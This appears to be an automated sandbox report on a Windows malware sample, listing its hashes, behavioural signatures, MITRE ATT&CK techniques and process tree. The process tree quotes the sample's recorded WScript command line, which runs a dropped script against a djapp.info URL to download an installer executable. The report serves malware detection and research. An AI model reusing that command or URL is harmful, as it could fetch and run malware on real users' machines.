Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2022 04:19

General

  • Target

    abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe

  • Size

    184KB

  • MD5

    02181395640c9db0f673cbff90f1f06e

  • SHA1

    0b69a0624d9268c0a654bea7f1f884a8f60be13c

  • SHA256

    abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240

  • SHA512

    ea65801585a88abe8acf1b3de7ef631e8ff144b0bdc29e40ddb1db8cd9c3d3ac552f8a216a0b23d404fbd587f62a56664b63f295855f52488b438594db1b0e38

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Y:/7BSH8zUB+nGESaaRvoB7FJNndnN

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe
    "C:\Users\Admin\AppData\Local\Temp\abe4f74f8940d21246a8c5ba1af352032f1430a7b72279ad25ac293de2ea7240.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3356
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf794B.js" http://www.djapp.info/?domain=DpULTVAAYZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf794B.exe
      2⤵
      • Blocklisted process makes network request
      PID:4556
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf794B.js" http://www.djapp.info/?domain=DpULTVAAYZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf794B.exe
      2⤵
      • Blocklisted process makes network request
      PID:4340
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf794B.js" http://www.djapp.info/?domain=DpULTVAAYZ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf794B.exe
      2⤵
      • Blocklisted process makes network request
      PID:2392

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf794B.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • memory/2392-135-0x0000000000000000-mapping.dmp
  • memory/4340-134-0x0000000000000000-mapping.dmp
  • memory/4556-132-0x0000000000000000-mapping.dmp